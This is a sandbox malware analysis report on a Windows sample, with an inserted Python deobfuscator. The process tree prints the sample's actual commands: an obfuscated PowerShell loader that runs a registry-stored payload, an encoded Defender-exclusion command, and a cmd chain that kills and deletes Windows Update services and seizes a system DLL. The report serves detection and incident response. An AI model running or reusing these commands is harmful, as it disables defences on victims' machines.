Analysis

  • max time kernel
    120s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240704-en locale:en-us os:windows7-x64 system
  • submitted
    14-08-2024 18:22

General

  • Target

    40eeb7e6dc706f7e0eac78cc85213220N.exe

  • Size

    4.8MB

  • MD5

    40eeb7e6dc706f7e0eac78cc85213220

  • SHA1

    28b55166002c4ba1c9af0ec4fd9f98b591d6e498

  • SHA256

    9709d21f40cd1def7d6bb809d5e11fa948ec7290e201ae2b2a62e1bd17368548

  • SHA512

    219713374a9bbaf254fd88f1834ca82fec95228b8de3890a466079866026491381caacd4309a9b7ab278cd5e92097fdee5105bbdbddc6c0b6743a6f871f6060f

  • SSDEEP

    98304:Ch5ZFrrBPngTB+XSOSp+yBmv1b4b4V+khcwhrkAkuRNSo:CTZFr5gT0XvyBmd4MsocFVuJ

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Power Settings 1 TTPs 10 IoCs

    powercfg controls the configurable power settings of a Windows host. Here it is abused to set the standby and hibernate timeouts to 0 (never) on both AC and battery power, so the infected host never sleeps or hibernates and the payload keeps running.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 7 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utility for controlling services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry key 1 TTPs 14 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
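The two powershell.EXE command lines launched from taskeng.exe in the process tree below are obfuscated with the PowerShell format operator ("{1}{0}" -f 'eT','S' evaluates to SeT), string concatenation and backtick-split member names, while the powershell.exe lines under updater.exe and under the submitted sample use -EncodedCommand, which is base64 over UTF-16LE padded with <# #> comments. The following Python is an added example, not part of this Triage report: it folds both forms back mechanically. The two sample strings are copied from the process tree (with the report's \" escaping removed), the regexes only handle the positional -f substitution and + concatenation seen here, and registry_stage() assumes the deobfuscated loader keeps the OpenSubKey/GetValue shape this sample has.

```python
"""Added example: fold the PowerShell obfuscation seen in this report back to readable text."""
import base64
import re

# Copied from the process tree (PID 1344 / 952), with the report's \" escaping removed.
OBFUSCATED = r'''.("{1}{0}" -f 'eT','S') ("6T"+"o") ([tYpE]("{2}{0}{4}{1}{3}" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe]("{3}{1}{2}{4}{0}"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::("{0}{1}" -f 'L','oad').Invoke( (.("{1}{2}{0}" -f 't-Item','g','e') ("vARI"+"Ab"+"lE"+":DlR4S") )."VA`luE"::"lOc`ALM`AChine".("{2}{1}{0}" -f 'ey','ubk','OpenS').Invoke(("{1}{0}"-f'E','SOFTWAR')).("{1}{0}{2}" -f'u','GetVal','e').Invoke(("{1}{2}{3}{0}"-f'ger','dia','lers','ta')))."EnT`Ryp`OINt"."in`VoKE"(${n`Ull},${n`ULl})'''

# Copied from the -EncodedCommand argument (PID 2904 / 2092).
ENCODED = ("PAAjAHUAeAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAdwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHcAbgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYQBnAHMAIwA+AA==")

# PowerShell backtick escapes are lowercase-only; any other backtick-prefixed char is literal,
# which is exactly what Invoke-Obfuscation style "VA`luE" relies on.
_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "a": "\a", "b": "\b", "f": "\f",
            "v": "\v", "0": "\0", "e": "\x1b"}
_LIT = r"""(?:"[^"]*"|'[^']*')"""  # one quoted literal


def _unquote(lit):
    body = lit[1:-1]
    if lit[0] == '"':  # only double-quoted strings interpret backticks
        body = re.sub(r"`(.)", lambda m: _ESCAPES.get(m.group(1), m.group(1)), body)
    return body


def _fold_format(m):
    """'{1}{0}' -f 'a','b'  ->  'ba'  (positional substitution only)."""
    fmt = _unquote(m.group(1))
    args = [_unquote(a) for a in re.findall(_LIT, m.group(2))]
    return "'" + re.sub(r"\{(\d+)\}", lambda n: args[int(n.group(1))], fmt) + "'"


def _fold_concat(m):
    """"a"+"b"+'c'  ->  'abc'."""
    return "'" + "".join(_unquote(s) for s in re.findall(_LIT, m.group(0))) + "'"


_FORMAT_RE = re.compile(r"(" + _LIT + r")\s*-[fF]\s*(" + _LIT + r"(?:\s*,\s*" + _LIT + r")*)")
_CONCAT_RE = re.compile(_LIT + r"(?:\s*\+\s*" + _LIT + r")+")


def deobfuscate(cmd):
    """Fold format-operator and concatenation tricks until nothing changes, then drop backticks."""
    prev = None
    while prev != cmd:
        prev = cmd
        cmd = _FORMAT_RE.sub(_fold_format, cmd)
        cmd = _CONCAT_RE.sub(_fold_concat, cmd)
    cmd = re.sub(r'"[^"]*"', lambda m: '"' + _unquote(m.group(0)) + '"', cmd)  # "VA`luE" -> "VAluE"
    cmd = re.sub(r"\$\{([^}]*)\}", lambda m: "$" + m.group(1).replace("`", ""), cmd)  # ${n`Ull} -> $nUll
    return cmd


def decode_encoded_command(b64):
    """-EncodedCommand is base64 over UTF-16LE; strip the <# #> comments used as padding."""
    text = base64.b64decode(b64).decode("utf-16-le")
    return re.sub(r"\s*<#.*?#>\s*", " ", text).strip()


def registry_stage(clean):
    """(subkey, value) the loader reads its payload from; assumes the OpenSubKey/GetValue shape seen here."""
    m = re.search(r"(?i)opensubkey'[^']*'([^']*)'.*?getvalue'[^']*'([^']*)'", clean)
    return (m.group(1), m.group(2)) if m else None


if __name__ == "__main__":
    clean = deobfuscate(OBFUSCATED)
    print(clean)
    print(registry_stage(clean))
    print(decode_encoded_command(ENCODED))
```

Resolved, the first script is Set-Variable (SeT) binding [reflection.Assembly] and [Microsoft.Win32.Registry], then [Reflection.Assembly]::Load on the bytes of HKLM\SOFTWARE value dialerstager followed by EntryPoint.Invoke($null,$null): the second stage is stored in the registry rather than on disk, which is why the sandbox sees dialer.exe run with no dropped payload beside it. The encoded command is Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force, i.e. the whole user profile and system drive are excluded from Defender scanning. On a suspect host, reg query HKLM\SOFTWARE /v dialerstager and (Get-MpPreference).ExclusionPath are the two quick checks.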

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:408
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{cbe60bff-e555-4475-bc84-4afd6cf62758}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1948
      • C:\Windows\SysWOW64\dllhost.exe
        C:\Windows\SysWOW64\dllhost.exe /Processid:{037cba3c-de0e-40c6-82ba-f4de163d725c}
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:1956
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
      • Sets service image path in registry
      • Suspicious behavior: LoadsDriver
      PID:460
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch
        2⤵
          PID:584
          • C:\Windows\system32\DllHost.exe
            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
            3⤵
              PID:1248
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k RPCSS
            2⤵
              PID:664
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
              2⤵
                PID:752
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                2⤵
                  PID:796
                  • C:\Windows\system32\Dwm.exe
                    "C:\Windows\system32\Dwm.exe"
                    3⤵
                      PID:1288
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs
                    2⤵
                    • Drops file in Windows directory
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of UnmapMainImage
                    PID:836
                    • C:\Windows\system32\taskeng.exe
                      taskeng.exe {72413DC2-2A6C-4540-B344-0104681548B4} S-1-5-18:NT AUTHORITY\System:Service:
                      3⤵
                        PID:1132
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                          4⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1344
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                          4⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:952
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {B9FA45F4-EB0A-4D77-B31A-B0F05C23D11D} S-1-5-21-2212144002-1172735686-1556890956-1000:MVFYZPLM\Admin:Interactive:[1]
                        3⤵
                        • Loads dropped DLL
                        PID:2404
                        • C:\Users\Admin\Google\Chrome\updater.exe
                          C:\Users\Admin\Google\Chrome\updater.exe
                          4⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2104
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAeAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAdwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHcAbgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYQBnAHMAIwA+AA=="
                            5⤵
                            • Drops file in System32 directory
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2904
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                            5⤵
                              PID:1224
                              • C:\Windows\system32\sc.exe
                                sc stop UsoSvc
                                6⤵
                                • Launches sc.exe
                                PID:2172
                              • C:\Windows\system32\sc.exe
                                sc stop WaaSMedicSvc
                                6⤵
                                • Launches sc.exe
                                PID:2912
                              • C:\Windows\system32\sc.exe
                                sc stop wuauserv
                                6⤵
                                • Launches sc.exe
                                PID:1616
                              • C:\Windows\system32\sc.exe
                                sc stop bits
                                6⤵
                                • Launches sc.exe
                                PID:1204
                              • C:\Windows\system32\sc.exe
                                sc stop dosvc
                                6⤵
                                • Launches sc.exe
                                PID:2420
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                6⤵
                                • Modifies registry key
                                PID:264
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                6⤵
                                • Modifies registry key
                                PID:2780
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                6⤵
                                • Modifies registry key
                                PID:1556
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                6⤵
                                • Modifies registry key
                                PID:2172
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                6⤵
                                • Modifies registry key
                                PID:2528
                              • C:\Windows\system32\takeown.exe
                                takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                6⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:2364
                              • C:\Windows\system32\icacls.exe
                                icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                6⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:2608
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                              5⤵
                              • Power Settings
                              PID:2856
                              • C:\Windows\system32\powercfg.exe
                                powercfg /x -hibernate-timeout-ac 0
                                6⤵
                                • Power Settings
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2764
                              • C:\Windows\system32\powercfg.exe
                                powercfg /x -hibernate-timeout-dc 0
                                6⤵
                                • Power Settings
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2016
                              • C:\Windows\system32\powercfg.exe
                                powercfg /x -standby-timeout-ac 0
                                6⤵
                                • Power Settings
                                • Suspicious use of AdjustPrivilegeToken
                                PID:884
                              • C:\Windows\system32\powercfg.exe
                                powercfg /x -standby-timeout-dc 0
                                6⤵
                                • Power Settings
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1688
                            • C:\Windows\System32\dialer.exe
                              C:\Windows\System32\dialer.exe "uscznjtdlrpzim"
                              5⤵
                                PID:2692
                              • C:\Windows\System32\dialer.exe
                                 C:\Windows\System32\dialer.exe qogpttybmmmxi0
                                5⤵
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SendNotifyMessage
                                PID:2452
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService
                          2⤵
                            PID:976
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k NetworkService
                            2⤵
                              PID:280
                            • C:\Windows\System32\spoolsv.exe
                              C:\Windows\System32\spoolsv.exe
                              2⤵
                                PID:964
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                                2⤵
                                  PID:1016
                                • C:\Windows\system32\taskhost.exe
                                  "taskhost.exe"
                                  2⤵
                                    PID:1176
                                  • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                                    "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
                                    2⤵
                                      PID:2020
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                      2⤵
                                        PID:1916
                                      • C:\Windows\system32\sppsvc.exe
                                        C:\Windows\system32\sppsvc.exe
                                        2⤵
                                          PID:1880
                                      • C:\Windows\system32\lsass.exe
                                        C:\Windows\system32\lsass.exe
                                        1⤵
                                          PID:476
                                        • C:\Windows\system32\lsm.exe
                                          C:\Windows\system32\lsm.exe
                                          1⤵
                                            PID:484
                                          • C:\Windows\Explorer.EXE
                                            C:\Windows\Explorer.EXE
                                            1⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1352
                                            • C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe
                                              "C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe"
                                              2⤵
                                              • Suspicious use of SetThreadContext
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of WriteProcessMemory
                                              PID:1360
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAeAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAdwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHcAbgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYQBnAHMAIwA+AA=="
                                                3⤵
                                                • Drops file in System32 directory
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2092
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                3⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:2756
                                                • C:\Windows\system32\sc.exe
                                                  sc stop UsoSvc
                                                  4⤵
                                                  • Launches sc.exe
                                                  PID:2936
                                                • C:\Windows\system32\sc.exe
                                                  sc stop WaaSMedicSvc
                                                  4⤵
                                                  • Launches sc.exe
                                                  PID:3004
                                                • C:\Windows\system32\sc.exe
                                                  sc stop wuauserv
                                                  4⤵
                                                  • Launches sc.exe
                                                  PID:2760
                                                • C:\Windows\system32\sc.exe
                                                  sc stop bits
                                                  4⤵
                                                  • Launches sc.exe
                                                  PID:2924
                                                • C:\Windows\system32\sc.exe
                                                  sc stop dosvc
                                                  4⤵
                                                  • Launches sc.exe
                                                  PID:2676
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:2616
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:2636
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                                  4⤵
                                                  • Modifies security service
                                                  • Modifies registry key
                                                  PID:2684
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:2692
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:2528
                                                • C:\Windows\system32\takeown.exe
                                                  takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2052
                                                • C:\Windows\system32\icacls.exe
                                                  icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:824
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:2980
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:1276
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:1724
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:532
                                                • C:\Windows\system32\schtasks.exe
                                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                                  4⤵
                                                    PID:1900
                                                  • C:\Windows\system32\schtasks.exe
                                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                                    4⤵
                                                      PID:2380
                                                    • C:\Windows\system32\schtasks.exe
                                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                                      4⤵
                                                        PID:2576
                                                      • C:\Windows\system32\schtasks.exe
                                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                                        4⤵
                                                          PID:1992
                                                        • C:\Windows\system32\schtasks.exe
                                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                                          4⤵
                                                            PID:2272
                                                          • C:\Windows\system32\schtasks.exe
                                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                                            4⤵
                                                              PID:2360
                                                            • C:\Windows\system32\schtasks.exe
                                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                              4⤵
                                                                PID:740
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                              3⤵
                                                              • Power Settings
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:2784
                                                              • C:\Windows\system32\powercfg.exe
                                                                powercfg /x -hibernate-timeout-ac 0
                                                                4⤵
                                                                • Power Settings
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2648
                                                              • C:\Windows\system32\powercfg.exe
                                                                powercfg /x -hibernate-timeout-dc 0
                                                                4⤵
                                                                • Power Settings
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2296
                                                              • C:\Windows\system32\powercfg.exe
                                                                powercfg /x -standby-timeout-ac 0
                                                                4⤵
                                                                • Power Settings
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2792
                                                              • C:\Windows\system32\powercfg.exe
                                                                powercfg /x -standby-timeout-dc 0
                                                                4⤵
                                                                • Power Settings
